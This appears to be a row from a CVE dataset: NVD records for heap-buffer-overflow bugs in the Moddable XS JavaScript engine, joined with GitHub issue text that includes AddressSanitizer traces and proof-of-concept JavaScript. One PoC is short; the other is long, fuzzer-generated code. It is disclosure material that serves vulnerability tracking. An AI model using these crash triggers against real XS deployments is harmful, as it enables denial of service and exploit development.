#195 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#196 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#197 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#198 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#199 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#200 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#201 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#202 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#203 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#204 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#205 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#206 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#207 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#208 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#209 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#210 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#211 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#212 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#213 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#214 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#215 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#216 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#217 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#218 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#219 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#220 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#221 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#222 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#223 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#224 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#225 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#226 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#227 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#228 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#229 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#230 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#231 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#232 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#233 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#234 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#235 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#236 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#237 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#238 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#239 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#240 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#241 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#242 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#243 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#244 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#245 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#246 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#247 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#248 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#249 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#250 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
#251 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877
SUMMARY: AddressSanitizer: stack-overflow ??:0 ??
==5984==ABORTING
``` | stack-overflow | https://api.github.com/repos/Moddable-OpenSource/moddable/issues/586/comments | 0 | 2021-02-26T10:34:42Z | 2021-03-23T22:52:57Z | https://github.com/Moddable-OpenSource/moddable/issues/586 | 817,239,712 | 586 | 2,794 |
CVE-2021-29325 | 2021-11-19T17:15:08.113 | OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fx_String_prototype_repeat function at /moddable/xs/sources/xsString.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/582"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/582"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/Moddable-OpenSource/moddable/issues/582 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Moddable-OpenSource",
"moddable"
] | # Enviroment
```
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
function getHiddenValue(){
var obj = {};
var oob = "/re/";
//oob = oob.replace("re","*".repeat(0x2000));
oob = oob.replace("re",oob = oob.replace("re","*".repeat(0x100000)).repeat(0x100000));
var str = 'class x extends Array{'+oob+"}";
var fun = eval(str);
Object.assign(obj,fun);
return obj;
}
function makeOobString(){
var hiddenValue = getHiddenValue();
var str = 'class x extends Array{}';
var fun = eval(str);
Object.assign(fun,hiddenValue);
var oobString = fun.toString();
return oobString;
}
var oobString = makeOobString();
```
# description
```
=================================================================
==5944==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f751f1fe820 at pc 0x7f75226c5904 bp 0x7fffc01aa870 sp 0x7fffc01aa018
WRITE of size 1048578 at 0x7f751f1fe820 thread T0
#0 0x7f75226c5903 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c903)
#1 0x61c670 in fx_String_prototype_repeat /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsString.c:969
#2 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
#3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
#4 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
#5 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
#6 0x7f7521d6982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#7 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
0x7f751f1fe820 is located 0 bytes to the right of 16777248-byte region [0x7f751e1fe800,0x7f751f1fe820)
allocated by thread T0 here:
#0 0x7f75226d1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122
#2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377
#3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159
#4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305
#5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249
#6 0x7f7521d6982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
Shadow bytes around the buggy address:
0x0fef23e37cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fef23e37cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fef23e37cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fef23e37ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fef23e37cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fef23e37d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
0x0fef23e37d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fef23e37d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fef23e37d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fef23e37d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fef23e37d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==5944==ABORTING
``` | heap-buffer-overflow(fx_String_prototype_repeat) | https://api.github.com/repos/Moddable-OpenSource/moddable/issues/582/comments | 0 | 2021-02-26T10:30:19Z | 2021-03-23T22:52:56Z | https://github.com/Moddable-OpenSource/moddable/issues/582 | 817,236,483 | 582 | 2,795 |
CVE-2021-29326 | 2021-11-19T17:15:08.157 | OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fxIDToString function at /moddable/xs/sources/xsSymbol.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/583"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/583"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/Moddable-OpenSource/moddable/issues/583 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Moddable-OpenSource",
"moddable"
] | # Enviroment
```
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
var b2 = new Uint8Array(171);
b2[0] = 0;
b2[1] = 97;
function makeOobString() {
var hiddenValue = getHiddenValue();
var fun = eval(str);
var str = '\'\'';
var c = foo(/[\s\r\n]+/g).map(m, 'AAAA');
var fun = eval(str);
var oobString = makeOobString();
var hiddenValue = getHiddenValue();
f(fun, hiddenValue);
var oobString = WebAssembly.Module();
var fun = eval(str);
return oobString;
}
b2[2] = 115;
var i = 0;
b2[3] = 109;
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
42,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
function getHiddenValue() {
var obj = {};
var oob = '(new Number(0))';
oob = 'valueOf'.repeat('re', JSON.parse(978));
var str = 'U*|m^c}d|#~^.g';
function foo(x) {
MEM[array.length] *= 0;
var o = a.map.call(p, test);
}
var fun = eval(str);
var a = new Array(1, 2, 3);
f(obj, fun);
var ar = new Int8Array(c[0]);
return obj;
}
b2[4] = 1;
function getHiddenValue() {
var MEM = new stdlib.Uint8Array(heap);
var handler = {
get: function (target, name) {
if (name == '') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
var oobString = makeOobString();
return true;
}
};
var obj = {};
function getHiddenValue() {
var obj = {};
var oob = '[\'z\']';
oob = oob.replace('re', ' \'use strict\' '.repeat(1048576));
var str = 'new Number(1)' + oob + 'enumberable';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var oobString = fun.toString();
var str = '-0';
var d = new Array(1, 2, 3);
function getHiddenValue() {
var ar = new Int8Array(c[0]);
var obj = {};
var handler = {
get: function (target, name) {
if (name == '({valueOf:function(){return 0;}})') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
var oob = 'eval';
return true;
}
};
var oob = 'call';
oob = f('re', log(0.45603744997993667));
var str = 'caller';
function foo(x) {
var oobString = makeOobString();
MEM[array.length] *= 0;
var obj = {};
var m = parseInt(new Uint8Array(log(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
}
var fun = eval(str);
var oobString = fun.toString();
'00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(obj, fun);
var m = ''.repeat(new Uint8Array(parseInt.customSections(v => parseInt(v, 16))));
return obj;
}
var oob = '(new String(\'\'))';
oob = Object('[]', eval(1048576));
function getHiddenValue() {
var obj = {};
var oob = 'createIsHTMLDDA()';
oob = oob.replace('configurable', 'eval'.repeat(1048576));
var str = '{}' + oob + '({valueOf:function(){return 0;}})';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var o = a.map.call(p, test);
var str = str;
var str = ' /x/g ';
var array = [];
var d = new Array(1, 2, 3);
var str = '<h3>';
var fun = eval(str);
eval(obj, fun);
var fun = eval(str);
var a = new Array(1, 2, 3);
function log() {
var str = '<h3>';
for (var i = 0; KTta; i++) {
str += arguments[i];
}
str += '</h3>';
FMRc.call(/[\s\r\n]+/g).map(str);
}
var p = new Proxy([], handler);
return obj;
}
var HJaX = Promise;
var m = '00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(new Uint8Array(parseInt(v => parseInt(v, 16))));
function log() {
var str = '1';
var oobString = fun.toString();
for (var i = 0; GXka; i++) {
str += arguments[i];
}
str += '</h3>';
function test() {
return 131354989131639;
}
getHiddenValue(str);
}
b2[5] = 0;
function test() {
var oobString = fun.toString();
return 131354989131639;
}
b2[374] = 0;
var hiddenValue = getHiddenValue();
b2[7] = 0;
b2[0.6882051344744746] = 1;
var hiddenValue = getHiddenValue();
var r = new RegExp(RegExp(' /x/g '));
var i = 0;
b2[9] = 14;
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = 'arguments.callee';
var o = a.map.call(p, test);
var fun = eval(str);
var fun = eval(str);
var m = JSON.stringify(/[\s\r\n]+/g).map(new Uint8Array(print(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
var handler = {
get: function (target, name) {
if (name == 'length') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
var ar = new Int8Array(c[0]);
Object(fun, hiddenValue);
var oobString = eval();
return oobString;
function getHiddenValue() {
var obj = {};
var oob = '-Infinity';
oob = parseInt('({x:3})', Object(1048576));
var ar = new Int8Array(c[0]);
var str = ' \'use strict\' ';
function foo(x) {
MEM[array.length] *= 0;
}
var o = a.map.call(p, test);
var fun = eval(str);
function log() {
var str = '<h3>';
for (var i = 0; GXka; i++) {
var oobString = fun.toString();
str += arguments[i];
function test() {
return 131354989131639;
}
}
str += 'arguments.callee';
var str = '{}' + oob + 'call';
f(str);
}
'prototype'.repeat(obj, fun);
return obj;
}
}
var oobString = makeOobString();
var o = a.map.call(p, test);
var fun = eval(str);
var GXka = new Boolean();
var Wtwd = new Map([
[
667,
-9007199254740994,
443,
0.07347175385557603,
-9007199254740992
],
[
-364,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
0.44760134769754445,
3037000498
]
]);
b2[10] = 3;
var a = new Array(1, 0.045601841670223076, 0.10425251163056126);
b2[11] = 96;
b2[12] = 1;
var str = '-Infinity';
b2[13] = 127;
b2[14] = 0;
b2[15] = 96;
var i = 0;
var array = [];
b2[16] = 775;
var hiddenValue = getHiddenValue();
var str = '<h3>';
b2[17] = 55;
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
876,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
var str = 'new String(\'q\')';
b2[18] = 96;
var obj = {};
var m = '*'.repeat(new Uint8Array(getHiddenValue(v => parseInt(v, 16))));
b2[19] = 2;
b2[20] = 127;
var c = fun.toString(m, 'arguments.callee');
b2[21] = 127;
var oob = '/re/';
var oobString = makeOobString();
var p = new Proxy([], handler);
b2[22] = 0.3450387102817629;
var fun = eval(str);
var str = '[0]';
var Wtwd = new Map([
[
1073741823,
-672,
42,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
b2[23] = 833;
b2[24] = 2;
var fun = eval(str);
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
42,
0.2,
-9007199254740992
],
[
-826,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
b2[25] = 35;
function getHiddenValue() {
var obj = {};
var p = new Proxy([], handler);
var i = 0;
function test() {
return 131354989131639;
}
var oob = '{x:3}';
var a = new Array(1, 2, 3);
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = 'function(){}';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
oob = f('re', foo(/[\s\r\n]+/g).map(1048576));
var str = oob;
function foo(x) {
var fun = eval(str);
MEM[array.length] *= 0;
}
var fun = eval(str);
''.repeat(obj, fun);
var obj = {};
var handler = {
get: function (target, name) {
if (name == 'apply') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
var oob = 'eval';
return true;
}
};
var m = foo(/[\s\r\n]+/g).map(new Uint8Array(foo(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
var str = '{}' + oob + '}';
var p = new Proxy([], handler);
return obj;
}
b2[26] = 2;
var ar = new Int8Array(c[0.14427504137296565]);
b2[0.21503255514884878] = 2;
var fun = eval(str);
b2[28] = 106;
b2[0.25818522699508195] = 115;
var obj = {};
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
42,
0.2,
-0.29683083976254676
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
var fun = eval(str);
var m = f(new Uint8Array(WebAssembly.Module(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
var fun = eval(str);
b2[30] = 3;
function log() {
var str = '';
var hiddenValue = getHiddenValue();
for (var i = 0; KTta; i++) {
str += arguments[i];
}
var oobString = fun.toString();
str += 'callee';
foo(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(str);
}
b2[934] = 0.13520367501571928;
function getHiddenValue() {
var obj = {};
var obj = {};
var oob = '';
var a = new Array(1, 2, 3);
oob = log('*', log(/[\s\r\n]+/g).map(1048576));
var str = '<h3>';
var str = '/0/';
function getHiddenValue() {
var obj = {};
var oob = 'valueOf';
oob = oob.replace('re', 'eval'.repeat(1048576));
var str = '{}' + oob + '}';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
function foo(x) {
MEM[array.length] *= 0;
}
var i = 0;
var m = getHiddenValue(new Uint8Array(eval(v => parseInt(v, 161))));
var i = 0;
var fun = eval(str);
'*'.repeat(obj, fun);
return obj;
}
b2[32] = 0.6597113836158741;
b2[33] = 109;
b2[34] = 0.06746787618936523;
var i = 0;
var array = [];
b2[35] = 0;
b2[36] = 1;
var array = [];
var str = ' /x/ ' + oob + '';
var ar = new Int8Array(c[0]);
var str = '*';
b2[115] = 7;
var c = parseInt(m, 'AAAA');
b2[38] = 105;
b2[39] = 109;
var fun = eval(str);
var o = a.map.call(p, test);
var str = '1';
function makeOobString() {
var str = '+0' + oob + '}';
var hiddenValue = getHiddenValue();
var str = '({x:3})';
var fun = eval(str);
function getHiddenValue() {
var obj = {};
var oob = '({valueOf:function(){return 0;}})';
oob = oob.replace('re', '-Infinity'.repeat(1048576));
var str = 'v2' + oob + '__proto__';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var array = [];
var oobString = fun.toString();
var r = new RegExp(RegExp('(new Number(0))'));
getHiddenValue(fun, hiddenValue);
var foo = function (stdlib, foreign, heap) {
'1.23';
var MEM = new stdlib.Uint8Array(heap);
function foo(x) {
var i = 0;
MEM[MEM[b2[63]]] *= 0;
}
return { foo: foo };
var obj = {};
}(this, {}, new ArrayBuffer(1)).foo;
var str = 'null';
var oobString = foo();
return oobString;
}
b2[40] = 112;
b2[41] = 111;
var m = log(new Uint8Array(log(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
var oob = 'Infinity';
b2[42] = 114;
var r = new RegExp(RegExp(' /x/ '));
b2[43] = 116;
b2[44] = 115;
var obj = {};
var c = xhCc.call(m, '({x:3})');
b2[45] = 13;
var oobString = fun.toString();
var obj = {};
b2[46] = 105;
var m = f(new Uint8Array(WebAssembly.Module(v => parseInt(v, 16))));
b2[47] = 109;
b2[48] = 112;
b2[49] = 111;
var obj = {};
function getHiddenValue() {
var obj = {};
var str = 'apply' + oob + '}';
var oob = '/re/';
var fun = eval(str);
oob = print(' \'\\0\' ', eval(1048576));
var str = str;
function getHiddenValue() {
var obj = {};
var d = new Array(1, 2, 3);
var oob = '[1]';
var handler = {
get: function (target, name) {
if (name == '[1]') {
return 256;
}
var i = 0;
var hiddenValue = getHiddenValue();
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
var oob = 'eval';
oob = WebAssembly.Module('', 'valueOf'.repeat(1048576));
var str = ' \'use strict\' ';
function log() {
var str = '({valueOf:function(){return 0;}})';
var oobString = fun.toString();
for (var i = 0; GXka; i++) {
str += arguments[i];
var i = 0;
}
str += '</h3>';
'createIsHTMLDDA()'.repeat(str);
}
function foo(x) {
MEM[array.length] *= 0;
}
var fun = eval(str);
'00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(obj, fun);
return obj;
}
var fun = eval(str);
eval(obj, fun);
var a = new Array(0.7509782354189012, 0.1974859854024249, 3);
return obj;
var o = a.map.call(p, test);
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' /x/g ';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
}
var str = 'value' + ' \'A\' ';
var m = WebAssembly.Module(/[\s\r\n]+/g).map(new Uint8Array(foo(v => parseInt(v, 16))));
var hiddenValue = getHiddenValue();
var oobString = makeOobString();
var oobString = makeOobString();
for (var ijjkkk = 0; GXka; ++ijjkkk) {
var Wtwd = new Map([
[
0.7796790656098118,
-9007199254740994,
0.8206442487387069,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
0.8584196717738266,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
var DWXm = b2[18];
var i = 0;
}
var hiddenValue = getHiddenValue();
